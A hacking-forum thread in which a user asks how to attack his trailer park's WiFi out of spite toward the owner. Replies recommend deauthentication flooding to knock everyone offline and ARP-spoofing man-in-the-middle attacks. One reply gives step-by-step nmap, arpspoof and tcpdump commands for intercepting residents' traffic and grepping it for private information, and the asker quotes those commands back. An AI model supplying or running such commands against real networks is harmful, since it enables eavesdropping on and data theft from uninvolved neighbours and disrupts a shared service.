Sinisterly
What can I do to my trailer park while connected to their WiFi? - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Tutorials (https://sinister.ly/Forum-Tutorials)
+---- Forum: Requests (https://sinister.ly/Forum-Requests--826)
+---- Thread: What can I do to my trailer park while connected to their WiFi? (/Thread-What-can-I-do-to-my-trailer-park-while-connected-to-their-WiFi)



What can I do to my trailer park while connected to their WiFi? - Spring Roll - 09-09-2016

They have like some shitty Wi-Fi at the front desk that runs through the entire trailer park. Is there anyone on this website that could help me plot against th.eir server or something? The owner is quite a prick to my family members. I apologize for this being one of my first posts I'm simply new here and have lurked for a few days now - I intend to be more active.


RE: What can I do to my trailer park while connected to their WiFi? - Wildfire - 09-10-2016

Quite a few.
One way without even being connected is deauthentication spam. Effectively breaks the WiFi for everyone else.

But better yet, do "man-in-the-middle" attacks. ARP spoofing, for instance. Fuck all HTTP sites up with redirects to stupid crap and stop HTTPS sites from being accessed completely. Or, just, you know, capture private information.


RE: What can I do to my trailer park while connected to their WiFi? - superMAUS - 09-10-2016

(youll need a basic level of understanding for this & linux, if you dont have either ask and Ill explain)

On discovering the targets IP

To get the MAC addresses and IP's of targets (run as root)
nmap -O -sP ip/24

On arpspoofing and packet capturing

First of all make sure you are root. (sudo -s)

Route packets sent from your router to your target:
arpspoof -t gateway target & >/dev/null

Route packets sent from your target to your router:
arpspoof -t target gateway & >/dev/null

Capture packets being routed with tcpdump:
tcpdump -A -i any > dump

Grep for what you want and then profit!
You can essentially monitor large portions of their internet browsing.


RE: What can I do to my trailer park while connected to their WiFi? - Spring Roll - 09-11-2016

(09-10-2016, 06:26 AM)superMAUS Wrote: (youll need a basic level of understanding for this & linux, if you dont have either ask and Ill explain)

On discovering the targets IP

To get the MAC addresses and IP's of targets (run as root)
nmap -O -sP ip/24

On arpspoofing and packet capturing

First of all make sure you are root. (sudo -s)

Route packets sent from your router to your target:
arpspoof -t gateway target & >/dev/null

Route packets sent from your target to your router:
arpspoof -t target gateway & >/dev/null

Capture packets being routed with tcpdump:
tcpdump -A -i any > dump

Grep for what you want and then profit!
You can essentially monitor large portions of their internet browsing.

could i accomplish this through Kali? Unfortunately I am back home from the vacation totally forgot about posting the thread, so until next year... i will have to learn everything i can possibly do and become a mastermind Smile